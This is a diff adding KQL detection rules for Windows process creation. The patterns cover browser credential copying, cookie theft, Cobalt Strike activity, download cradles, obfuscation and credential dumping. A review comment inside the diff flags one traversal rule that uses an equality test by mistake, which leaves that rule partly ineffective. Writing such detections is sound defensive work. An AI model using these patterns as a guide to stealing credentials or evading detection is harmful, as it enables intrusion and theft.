+++ b/KQL/rules/windows/process_creation/potential_arbitrary_command_execution_via_ftp_exe.kql
@@ -0,0 +1,10 @@
+// Title: Potential Arbitrary Command Execution Via FTP.EXE
+// Author: Victor Sergeev, oscd.community
+// Date: 2020-10-09
+// Level: medium
+// Description: Detects execution of "ftp.exe" script with the "-s" or "/s" flag and any child processes ran by "ftp.exe".
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, attack.defense-evasion, attack.t1202
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\ftp.exe" or ((ProcessCommandLine contains "-s:" or ProcessCommandLine contains "/s:" or ProcessCommandLine contains "–s:" or ProcessCommandLine contains "—s:" or ProcessCommandLine contains "―s:") and (FolderPath endswith "\\ftp.exe" or ProcessVersionInfoOriginalFileName =~ "ftp.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_arbitrary_dll_load_using_winword.kql b/KQL/rules/windows/process_creation/potential_arbitrary_dll_load_using_winword.kql
new file mode 100644
index 00000000..05f7e90e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_arbitrary_dll_load_using_winword.kql
@@ -0,0 +1,10 @@
+// Title: Potential Arbitrary DLL Load Using Winword
+// Author: Victor Sergeev, oscd.community
+// Date: 2020-10-09
+// Level: medium
+// Description: Detects potential DLL sideloading using the Microsoft Office winword process via the '/l' flag.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1202
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/l " and ProcessCommandLine contains ".dll") and (FolderPath endswith "\\WINWORD.exe" or ProcessVersionInfoOriginalFileName =~ "WinWord.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_arbitrary_file_download_using_office_application.kql b/KQL/rules/windows/process_creation/potential_arbitrary_file_download_using_office_application.kql
new file mode 100644
index 00000000..c9a15cd8
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_arbitrary_file_download_using_office_application.kql
@@ -0,0 +1,10 @@
+// Title: Potential Arbitrary File Download Using Office Application
+// Author: Nasreddine Bencherchali (Nextron Systems), Beyu Denis, oscd.community
+// Date: 2022-05-17
+// Level: high
+// Description: Detects potential arbitrary file download using a Microsoft Office application
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1202
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and ((FolderPath endswith "\\EXCEL.EXE" or FolderPath endswith "\\POWERPNT.EXE" or FolderPath endswith "\\WINWORD.exe") or (ProcessVersionInfoOriginalFileName in~ ("Excel.exe", "POWERPNT.EXE", "WinWord.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_arbitrary_file_download_via_cmdl32_exe.kql b/KQL/rules/windows/process_creation/potential_arbitrary_file_download_via_cmdl32_exe.kql
new file mode 100644
index 00000000..250390c8
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_arbitrary_file_download_via_cmdl32_exe.kql
@@ -0,0 +1,12 @@
+// Title: Potential Arbitrary File Download Via Cmdl32.EXE
+// Author: frack113
+// Date: 2021-11-03
+// Level: medium
+// Description: Detects execution of Cmdl32 with the "/vpn" and "/lan" flags.
+// Attackers can abuse this utility in order to download arbitrary files via a configuration file.
+// Inspect the location and the content of the file passed as an argument in order to determine if it is suspicious.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1218, attack.t1202
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/vpn" and ProcessCommandLine contains "/lan") and (FolderPath endswith "\\cmdl32.exe" or ProcessVersionInfoOriginalFileName =~ "CMDL32.EXE")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_binary_impersonating_sysinternals_tools.kql b/KQL/rules/windows/process_creation/potential_binary_impersonating_sysinternals_tools.kql
new file mode 100644
index 00000000..a8fb2192
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_binary_impersonating_sysinternals_tools.kql
@@ -0,0 +1,12 @@
+// Title: Potential Binary Impersonating Sysinternals Tools
+// Author: frack113, Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2021-12-20
+// Level: medium
+// Description: Detects binaries that use the same name as legitimate sysinternals tools to evade detection.
+// This rule looks for the execution of binaries that are named similarly to Sysinternals tools.
+// Adversary may rename their malicious tools as legitimate Sysinternals tools to evade detection.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1218, attack.t1202, attack.t1036.005
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\accesschk64a.exe" or FolderPath endswith "\\ADExplorer64a.exe" or FolderPath endswith "\\ADInsight64a.exe" or FolderPath endswith "\\adrestore64a.exe" or FolderPath endswith "\\Autologon64a.exe" or FolderPath endswith "\\Autoruns64a.exe" or FolderPath endswith "\\autorunsc64a.exe" or FolderPath endswith "\\Clockres64a.exe" or FolderPath endswith "\\Contig64a.exe" or FolderPath endswith "\\Coreinfo64a.exe" or FolderPath endswith "\\Dbgview64a.exe" or FolderPath endswith "\\disk2vhd64a.exe" or FolderPath endswith "\\diskext64a.exe" or FolderPath endswith "\\DiskView64a.exe" or FolderPath endswith "\\du64a.exe" or FolderPath endswith "\\FindLinks64a.exe" or FolderPath endswith "\\handle64a.exe" or FolderPath endswith "\\hex2dec64a.exe" or FolderPath endswith "\\junction64a.exe" or FolderPath endswith "\\LoadOrd64a.exe" or FolderPath endswith "\\LoadOrdC64a.exe" or FolderPath endswith "\\logonsessions64a.exe" or FolderPath endswith "\\movefile64a.exe" or FolderPath endswith "\\notmyfault64a.exe" or FolderPath endswith "\\notmyfaultc64a.exe" or FolderPath endswith "\\pendmoves64a.exe" or FolderPath endswith "\\pipelist64a.exe" or FolderPath endswith "\\procdump64a.exe" or FolderPath endswith "\\procexp64a.exe" or FolderPath endswith "\\Procmon64a.exe" or FolderPath endswith "\\PsExec64a.exe" or FolderPath 
endswith "\\psfile64a.exe" or FolderPath endswith "\\PsGetsid64a.exe" or FolderPath endswith "\\PsInfo64a.exe" or FolderPath endswith "\\pskill64a.exe" or FolderPath endswith "\\psloglist64a.exe" or FolderPath endswith "\\pspasswd64a.exe" or FolderPath endswith "\\psping64a.exe" or FolderPath endswith "\\PsService64a.exe" or FolderPath endswith "\\pssuspend64a.exe" or FolderPath endswith "\\RAMMap64a.exe" or FolderPath endswith "\\RegDelNull64a.exe" or FolderPath endswith "\\ru64a.exe" or FolderPath endswith "\\sdelete64a.exe" or FolderPath endswith "\\sigcheck64a.exe" or FolderPath endswith "\\streams64a.exe" or FolderPath endswith "\\strings64a.exe" or FolderPath endswith "\\sync64a.exe" or FolderPath endswith "\\Sysmon64a.exe" or FolderPath endswith "\\tcpvcon64a.exe" or FolderPath endswith "\\tcpview64a.exe" or FolderPath endswith "\\vmmap64a.exe" or FolderPath endswith "\\whois64a.exe" or FolderPath endswith "\\Winobj64a.exe" or FolderPath endswith "\\ZoomIt64a.exe") or (FolderPath endswith "\\accesschk.exe" or FolderPath endswith "\\accesschk64.exe" or FolderPath endswith "\\AccessEnum.exe" or FolderPath endswith "\\ADExplorer.exe" or FolderPath endswith "\\ADExplorer64.exe" or FolderPath endswith "\\ADInsight.exe" or FolderPath endswith "\\ADInsight64.exe" or FolderPath endswith "\\adrestore.exe" or FolderPath endswith "\\adrestore64.exe" or FolderPath endswith "\\Autologon.exe" or FolderPath endswith "\\Autologon64.exe" or FolderPath endswith "\\Autoruns.exe" or FolderPath endswith "\\Autoruns64.exe" or FolderPath endswith "\\autorunsc.exe" or FolderPath endswith "\\autorunsc64.exe" or FolderPath endswith "\\Bginfo.exe" or FolderPath endswith "\\Bginfo64.exe" or FolderPath endswith "\\Cacheset.exe" or FolderPath endswith "\\Cacheset64.exe" or FolderPath endswith "\\Clockres.exe" or FolderPath endswith "\\Clockres64.exe" or FolderPath endswith "\\Contig.exe" or FolderPath endswith "\\Contig64.exe" or FolderPath endswith "\\Coreinfo.exe" or FolderPath 
endswith "\\Coreinfo64.exe" or FolderPath endswith "\\CPUSTRES.EXE" or FolderPath endswith "\\CPUSTRES64.EXE" or FolderPath endswith "\\ctrl2cap.exe" or FolderPath endswith "\\Dbgview.exe" or FolderPath endswith "\\dbgview64.exe" or FolderPath endswith "\\Desktops.exe" or FolderPath endswith "\\Desktops64.exe" or FolderPath endswith "\\disk2vhd.exe" or FolderPath endswith "\\disk2vhd64.exe" or FolderPath endswith "\\diskext.exe" or FolderPath endswith "\\diskext64.exe" or FolderPath endswith "\\Diskmon.exe" or FolderPath endswith "\\Diskmon64.exe" or FolderPath endswith "\\DiskView.exe" or FolderPath endswith "\\DiskView64.exe" or FolderPath endswith "\\du.exe" or FolderPath endswith "\\du64.exe" or FolderPath endswith "\\efsdump.exe" or FolderPath endswith "\\FindLinks.exe" or FolderPath endswith "\\FindLinks64.exe" or FolderPath endswith "\\handle.exe" or FolderPath endswith "\\handle64.exe" or FolderPath endswith "\\hex2dec.exe" or FolderPath endswith "\\hex2dec64.exe" or FolderPath endswith "\\junction.exe" or FolderPath endswith "\\junction64.exe" or FolderPath endswith "\\ldmdump.exe" or FolderPath endswith "\\listdlls.exe" or FolderPath endswith "\\listdlls64.exe" or FolderPath endswith "\\livekd.exe" or FolderPath endswith "\\livekd64.exe" or FolderPath endswith "\\loadOrd.exe" or FolderPath endswith "\\loadOrd64.exe" or FolderPath endswith "\\loadOrdC.exe" or FolderPath endswith "\\loadOrdC64.exe" or FolderPath endswith "\\logonsessions.exe" or FolderPath endswith "\\logonsessions64.exe" or FolderPath endswith "\\movefile.exe" or FolderPath endswith "\\movefile64.exe" or FolderPath endswith "\\notmyfault.exe" or FolderPath endswith "\\notmyfault64.exe" or FolderPath endswith "\\notmyfaultc.exe" or FolderPath endswith "\\notmyfaultc64.exe" or FolderPath endswith "\\ntfsinfo.exe" or FolderPath endswith "\\ntfsinfo64.exe" or FolderPath endswith "\\pendmoves.exe" or FolderPath endswith "\\pendmoves64.exe" or FolderPath endswith "\\pipelist.exe" or FolderPath 
endswith "\\pipelist64.exe" or FolderPath endswith "\\portmon.exe" or FolderPath endswith "\\procdump.exe" or FolderPath endswith "\\procdump64.exe" or FolderPath endswith "\\procexp.exe" or FolderPath endswith "\\procexp64.exe" or FolderPath endswith "\\Procmon.exe" or FolderPath endswith "\\Procmon64.exe" or FolderPath endswith "\\psExec.exe" or FolderPath endswith "\\psExec64.exe" or FolderPath endswith "\\psfile.exe" or FolderPath endswith "\\psfile64.exe" or FolderPath endswith "\\psGetsid.exe" or FolderPath endswith "\\psGetsid64.exe" or FolderPath endswith "\\psInfo.exe" or FolderPath endswith "\\psInfo64.exe" or FolderPath endswith "\\pskill.exe" or FolderPath endswith "\\pskill64.exe" or FolderPath endswith "\\pslist.exe" or FolderPath endswith "\\pslist64.exe" or FolderPath endswith "\\psLoggedon.exe" or FolderPath endswith "\\psLoggedon64.exe" or FolderPath endswith "\\psloglist.exe" or FolderPath endswith "\\psloglist64.exe" or FolderPath endswith "\\pspasswd.exe" or FolderPath endswith "\\pspasswd64.exe" or FolderPath endswith "\\psping.exe" or FolderPath endswith "\\psping64.exe" or FolderPath endswith "\\psService.exe" or FolderPath endswith "\\psService64.exe" or FolderPath endswith "\\psshutdown.exe" or FolderPath endswith "\\psshutdown64.exe" or FolderPath endswith "\\pssuspend.exe" or FolderPath endswith "\\pssuspend64.exe" or FolderPath endswith "\\RAMMap.exe" or FolderPath endswith "\\RAMMap64.exe" or FolderPath endswith "\\RDCMan.exe" or FolderPath endswith "\\RegDelNull.exe" or FolderPath endswith "\\RegDelNull64.exe" or FolderPath endswith "\\regjump.exe" or FolderPath endswith "\\ru.exe" or FolderPath endswith "\\ru64.exe" or FolderPath endswith "\\sdelete.exe" or FolderPath endswith "\\sdelete64.exe" or FolderPath endswith "\\ShareEnum.exe" or FolderPath endswith "\\ShareEnum64.exe" or FolderPath endswith "\\shellRunas.exe" or FolderPath endswith "\\sigcheck.exe" or FolderPath endswith "\\sigcheck64.exe" or FolderPath endswith 
"\\streams.exe" or FolderPath endswith "\\streams64.exe" or FolderPath endswith "\\strings.exe" or FolderPath endswith "\\strings64.exe" or FolderPath endswith "\\sync.exe" or FolderPath endswith "\\sync64.exe" or FolderPath endswith "\\Sysmon.exe" or FolderPath endswith "\\Sysmon64.exe" or FolderPath endswith "\\tcpvcon.exe" or FolderPath endswith "\\tcpvcon64.exe" or FolderPath endswith "\\tcpview.exe" or FolderPath endswith "\\tcpview64.exe" or FolderPath endswith "\\Testlimit.exe" or FolderPath endswith "\\Testlimit64.exe" or FolderPath endswith "\\vmmap.exe" or FolderPath endswith "\\vmmap64.exe" or FolderPath endswith "\\Volumeid.exe" or FolderPath endswith "\\Volumeid64.exe" or FolderPath endswith "\\whois.exe" or FolderPath endswith "\\whois64.exe" or FolderPath endswith "\\Winobj.exe" or FolderPath endswith "\\Winobj64.exe" or FolderPath endswith "\\ZoomIt.exe" or FolderPath endswith "\\ZoomIt64.exe")) and (not(((isnull(ProcessVersionInfoCompanyName) or isnull(ProcessVersionInfoProductName)) or ((ProcessVersionInfoCompanyName in~ ("Sysinternals - www.sysinternals.com", "Sysinternals")) or ProcessVersionInfoProductName startswith "Sysinternals")))) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/potential_binary_proxy_execution_via_cdb_exe.kql b/KQL/rules/windows/process_creation/potential_binary_proxy_execution_via_cdb_exe.kql new file mode 100644 index 00000000..f1fc8453 --- /dev/null +++ b/KQL/rules/windows/process_creation/potential_binary_proxy_execution_via_cdb_exe.kql 
@@ -0,0 +1,12 @@
+// Title: Potential Binary Proxy Execution Via Cdb.EXE
+// Author: Beyu Denis, oscd.community, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2019-10-26
+// Level: medium
+// Description: Detects usage of "cdb.exe" to launch arbitrary processes or commands from a debugger script file
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1106, attack.defense-evasion, attack.t1218, attack.t1127
+// False Positives:
+// - Legitimate use of debugging tools
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -c " or ProcessCommandLine contains " -cf ") and (FolderPath endswith "\\cdb.exe" or ProcessVersionInfoOriginalFileName =~ "CDB.Exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_binary_proxy_execution_via_vsdiagnostics_exe.kql b/KQL/rules/windows/process_creation/potential_binary_proxy_execution_via_vsdiagnostics_exe.kql
new file mode 100644
index 00000000..abf1edc8
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_binary_proxy_execution_via_vsdiagnostics_exe.kql
@@ -0,0 +1,12 @@
+// Title: Potential Binary Proxy Execution Via VSDiagnostics.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-03
+// Level: medium
+// Description: Detects execution of "VSDiagnostics.exe" with the "start" command in order to launch and proxy arbitrary binaries.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+// - Legitimate usage for tracing and diagnostics purposes
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " /launch:" or ProcessCommandLine contains " -launch:") and ProcessCommandLine contains "start" and (FolderPath endswith "\\VSDiagnostics.exe" or ProcessVersionInfoOriginalFileName =~ "VSDiagnostics.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_browser_data_stealing.kql b/KQL/rules/windows/process_creation/potential_browser_data_stealing.kql
new file mode 100644
index 00000000..2f198cda
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_browser_data_stealing.kql
@@ -0,0 +1,12 @@
+// Title: Potential Browser Data Stealing
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-12-23
+// Level: medium
+// Description: Adversaries may acquire credentials from web browsers by reading files specific to the target browser.
+// Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future.
+// Web browsers typically store the credentials in an encrypted format within a credential store.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1555.003
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "copy-item" or ProcessCommandLine contains "copy " or ProcessCommandLine contains "cpi " or ProcessCommandLine contains " cp " or ProcessCommandLine contains "move " or ProcessCommandLine contains "move-item" or ProcessCommandLine contains " mi " or ProcessCommandLine contains " mv ") or (FolderPath endswith "\\esentutl.exe" or FolderPath endswith "\\xcopy.exe" or FolderPath endswith "\\robocopy.exe") or (ProcessVersionInfoOriginalFileName in~ ("esentutl.exe", "XCOPY.EXE", "robocopy.exe"))) and (ProcessCommandLine contains "\\Amigo\\User Data" or ProcessCommandLine contains "\\BraveSoftware\\Brave-Browser\\User Data" or ProcessCommandLine contains "\\CentBrowser\\User Data" or ProcessCommandLine contains "\\Chromium\\User Data" or ProcessCommandLine contains "\\CocCoc\\Browser\\User Data" or ProcessCommandLine contains "\\Comodo\\Dragon\\User Data" or ProcessCommandLine contains "\\Elements Browser\\User Data" or ProcessCommandLine contains "\\Epic Privacy Browser\\User Data" or ProcessCommandLine contains "\\Google\\Chrome Beta\\User Data" or ProcessCommandLine contains "\\Google\\Chrome SxS\\User Data" or ProcessCommandLine contains "\\Google\\Chrome\\User Data\\" or ProcessCommandLine contains "\\Kometa\\User Data" or ProcessCommandLine contains "\\Maxthon5\\Users" or ProcessCommandLine contains 
"\\Microsoft\\Edge\\User Data" or ProcessCommandLine contains "\\Mozilla\\Firefox\\Profiles" or ProcessCommandLine contains "\\Nichrome\\User Data" or ProcessCommandLine contains "\\Opera Software\\Opera GX Stable\\" or ProcessCommandLine contains "\\Opera Software\\Opera Neon\\User Data" or ProcessCommandLine contains "\\Opera Software\\Opera Stable\\" or ProcessCommandLine contains "\\Orbitum\\User Data" or ProcessCommandLine contains "\\QIP Surf\\User Data" or ProcessCommandLine contains "\\Sputnik\\User Data" or ProcessCommandLine contains "\\Torch\\User Data" or ProcessCommandLine contains "\\uCozMedia\\Uran\\User Data" or ProcessCommandLine contains "\\Vivaldi\\User Data") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/potential_cobaltstrike_process_patterns.kql b/KQL/rules/windows/process_creation/potential_cobaltstrike_process_patterns.kql new file mode 100644 index 00000000..b77923f8 --- /dev/null +++ b/KQL/rules/windows/process_creation/potential_cobaltstrike_process_patterns.kql 
@@ -0,0 +1,10 @@
+// Title: Potential CobaltStrike Process Patterns
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-07-27
+// Level: high
+// Description: Detects potential process patterns related to Cobalt Strike beacon activity
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceProcessEvents
+| where (ProcessCommandLine endswith "conhost.exe 0xffffffff -ForceV1" and (InitiatingProcessCommandLine contains "cmd.exe /C echo" and InitiatingProcessCommandLine contains " > \\\\.\\pipe")) or (ProcessCommandLine endswith "conhost.exe 0xffffffff -ForceV1" and InitiatingProcessCommandLine endswith "/C whoami") or (ProcessCommandLine endswith "cmd.exe /C whoami" and InitiatingProcessFolderPath startswith "C:\\Temp\\") or ((ProcessCommandLine contains "cmd.exe /c echo" and ProcessCommandLine contains "> \\\\.\\pipe") and (InitiatingProcessFolderPath endswith "\\runonce.exe" or InitiatingProcessFolderPath endswith "\\dllhost.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_com_objects_download_cradles_usage_process_creation.kql b/KQL/rules/windows/process_creation/potential_com_objects_download_cradles_usage_process_creation.kql
new file mode 100644
index 00000000..1be42575
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_com_objects_download_cradles_usage_process_creation.kql
@@ -0,0 +1,12 @@
+// Title: Potential COM Objects Download Cradles Usage - Process Creation
+// Author: frack113
+// Date: 2022-12-25
+// Level: medium
+// Description: Detects usage of COM objects that can be abused to download files in PowerShell by CLSID
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+// False Positives:
+// - Legitimate use of the library
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "[Type]::GetTypeFromCLSID(" and (ProcessCommandLine contains "0002DF01-0000-0000-C000-000000000046" or ProcessCommandLine contains "F6D90F16-9C73-11D3-B32E-00C04F990BB4" or ProcessCommandLine contains "F5078F35-C551-11D3-89B9-0000F81FE221" or ProcessCommandLine contains "88d96a0a-f192-11d4-a65f-0040963251e5" or ProcessCommandLine contains "AFBA6B42-5692-48EA-8141-DC517DCF0EF1" or ProcessCommandLine contains "AFB40FFD-B609-40A3-9828-F88BBE11E4E3" or ProcessCommandLine contains "88d96a0b-f192-11d4-a65f-0040963251e5" or ProcessCommandLine contains "2087c2f4-2cef-4953-a8ab-66779b670495" or ProcessCommandLine contains "000209FF-0000-0000-C000-000000000046" or ProcessCommandLine contains "00024500-0000-0000-C000-000000000046")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_command_line_path_traversal_evasion_attempt.kql b/KQL/rules/windows/process_creation/potential_command_line_path_traversal_evasion_attempt.kql
new file mode 100644
index 00000000..7a92d063
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_command_line_path_traversal_evasion_attempt.kql
@@ -0,0 +1,13 @@
+// Title: Potential Command Line Path Traversal Evasion Attempt
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-10-26
+// Level: medium
+// Description: Detects potential evasion or obfuscation attempts using bogus path traversal via the commandline
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036
+// False Positives:
+// - Google Drive
+// - Citrix
+
+DeviceProcessEvents
+| where (((ProcessCommandLine contains "\\..\\Windows\\" or ProcessCommandLine contains "\\..\\System32\\" or ProcessCommandLine contains "\\..\\..\\") and FolderPath contains "\\Windows\\") or ProcessCommandLine contains ".exe\\..\\") and (not((ProcessCommandLine contains "\\Citrix\\Virtual Smart Card\\Citrix.Authentication.VirtualSmartcard.Launcher.exe\\..\\" or ProcessCommandLine contains "\\Google\\Drive\\googledrivesync.exe\\..\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_commandline_obfuscation_using_escape_characters.kql b/KQL/rules/windows/process_creation/potential_commandline_obfuscation_using_escape_characters.kql
new file mode 100644
index 00000000..b45535bc
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_commandline_obfuscation_using_escape_characters.kql
@@ -0,0 +1,10 @@
+// Title: Potential Commandline Obfuscation Using Escape Characters
+// Author: juju4
+// Date: 2018-12-11
+// Level: medium
+// Description: Detects potential commandline obfuscation using known escape characters
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1140
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "h^t^t^p" or ProcessCommandLine contains "h\"t\"t\"p"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_commandline_obfuscation_using_unicode_characters_from_suspicious_image.kql b/KQL/rules/windows/process_creation/potential_commandline_obfuscation_using_unicode_characters_from_suspicious_image.kql new file mode 100644 index 00000000..b533fb41 --- /dev/null +++ b/KQL/rules/windows/process_creation/potential_commandline_obfuscation_using_unicode_characters_from_suspicious_image.kql @@ -0,0 +1,11 @@ +// Title: Potential CommandLine Obfuscation Using Unicode Characters From Suspicious Image +// Author: frack113, Florian Roth (Nextron Systems), Josh Nickels +// Date: 2024-09-02 +// Level: high +// Description: Detects potential commandline obfuscation using unicode characters. +// Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027 + +DeviceProcessEvents +| where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe") and (ProcessVersionInfoOriginalFileName in~ ("Cmd.EXE", "cscript.exe", "PowerShell.EXE", "PowerShell_ISE.EXE", "pwsh.dll", "wscript.exe"))) and (ProcessCommandLine contains "ˣ" or ProcessCommandLine contains "˪" or ProcessCommandLine contains "ˢ" or ProcessCommandLine contains "∕" or ProcessCommandLine contains "⁄" or ProcessCommandLine contains "―" or ProcessCommandLine contains "—" or ProcessCommandLine contains " " or ProcessCommandLine contains "¯" or ProcessCommandLine contains "®" or ProcessCommandLine contains "¶" or ProcessCommandLine contains "⠀") \ No newline at end of file 
diff --git a/KQL/rules/windows/process_creation/potential_commandline_path_traversal_via_cmd_exe.kql b/KQL/rules/windows/process_creation/potential_commandline_path_traversal_via_cmd_exe.kql
new file mode 100644
index 00000000..7f970e5e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_commandline_path_traversal_via_cmd_exe.kql
@@ -0,0 +1,12 @@
+// Title: Potential CommandLine Path Traversal Via Cmd.EXE
+// Author: xknow @xknow_infosec, Tim Shelton
+// Date: 2020-06-11
+// Level: high
+// Description: Detects potential path traversal attempt via cmd.exe. Could indicate possible command/argument confusion/hijacking
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.003
+// False Positives:
+// - Java tools are known to produce false-positive when loading libraries
+
+DeviceProcessEvents
+| where (((InitiatingProcessCommandLine contains "/c" or InitiatingProcessCommandLine contains "/k" or InitiatingProcessCommandLine contains "/r") or (ProcessCommandLine contains "/c" or ProcessCommandLine contains "/k" or ProcessCommandLine contains "/r")) and (InitiatingProcessFolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "cmd.exe") and (InitiatingProcessCommandLine =~ "/../../" or ProcessCommandLine contains "/../../")) and (not(ProcessCommandLine contains "\\Tasktop\\keycloak\\bin\\/../../jre\\bin\\java"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_configuration_and_service_reconnaissance_via_reg_exe.kql b/KQL/rules/windows/process_creation/potential_configuration_and_service_reconnaissance_via_reg_exe.kql
new file mode 100644
index 00000000..ce8d5c18
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_configuration_and_service_reconnaissance_via_reg_exe.kql
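Review bot: In the `| where` line of potential_commandline_path_traversal_via_cmd_exe.kql the parent-side traversal test is written as `InitiatingProcessCommandLine =~ "/../../"`, which in KQL is a case-insensitive equality against the whole string, so that branch only fires when the parent's entire command line is exactly `/../../`; the sibling child-side test on the same line uses `contains`, and the rule's description speaks of a traversal appearing anywhere in the command line. This looks like a conversion artefact rather than intent, and it silently drops half of the detection coverage. Suggested change: `(InitiatingProcessCommandLine contains "/../../" or ProcessCommandLine contains "/../../")`. Worth checking the converter for other places where a `contains` modifier on a parent field is emitted as `=~`, since the same pattern would affect every generated rule.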
@@ -0,0 +1,12 @@
+// Title: Potential Configuration And Service Reconnaissance Via Reg.EXE
+// Author: Timur Zinniatullin, oscd.community
+// Date: 2019-10-21
+// Level: medium
+// Description: Detects the usage of "reg.exe" in order to query reconnaissance information from the registry. Adversaries may interact with the Windows registry to gather information about credentials, the system, configuration, and installed software.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1012, attack.t1007
+// False Positives:
+// - Discord
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "query" and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") and (ProcessCommandLine contains "currentVersion\\windows" or ProcessCommandLine contains "winlogon\\" or ProcessCommandLine contains "currentVersion\\shellServiceObjectDelayLoad" or ProcessCommandLine contains "currentVersion\\run" or ProcessCommandLine contains "currentVersion\\policies\\explorer\\run" or ProcessCommandLine contains "currentcontrolset\\services")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_cookies_session_hijacking.kql b/KQL/rules/windows/process_creation/potential_cookies_session_hijacking.kql
new file mode 100644
index 00000000..04d151e4
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_cookies_session_hijacking.kql
@@ -0,0 +1,10 @@
+// Title: Potential Cookies Session Hijacking
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-07-27
+// Level: medium
+// Description: Detects execution of "curl.exe" with the "-c" flag in order to save cookie data.
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where (ProcessCommandLine matches regex "\\s-c\\s" or ProcessCommandLine contains "--cookie-jar") and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_credential_dumping_attempt_using_new_networkprovider_cli.kql b/KQL/rules/windows/process_creation/potential_credential_dumping_attempt_using_new_networkprovider_cli.kql
new file mode 100644
index 00000000..c913f200
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_credential_dumping_attempt_using_new_networkprovider_cli.kql
@@ -0,0 +1,12 @@
+// Title: Potential Credential Dumping Attempt Using New NetworkProvider - CLI
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-23
+// Level: high
+// Description: Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003
+// False Positives:
+// - Other legitimate network providers used and not filtred in this rule
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "\\System\\CurrentControlSet\\Services\\" and ProcessCommandLine contains "\\NetworkProvider"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_credential_dumping_via_lsass_process_clone.kql b/KQL/rules/windows/process_creation/potential_credential_dumping_via_lsass_process_clone.kql
new file mode 100644
index 00000000..6650139b
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_credential_dumping_via_lsass_process_clone.kql
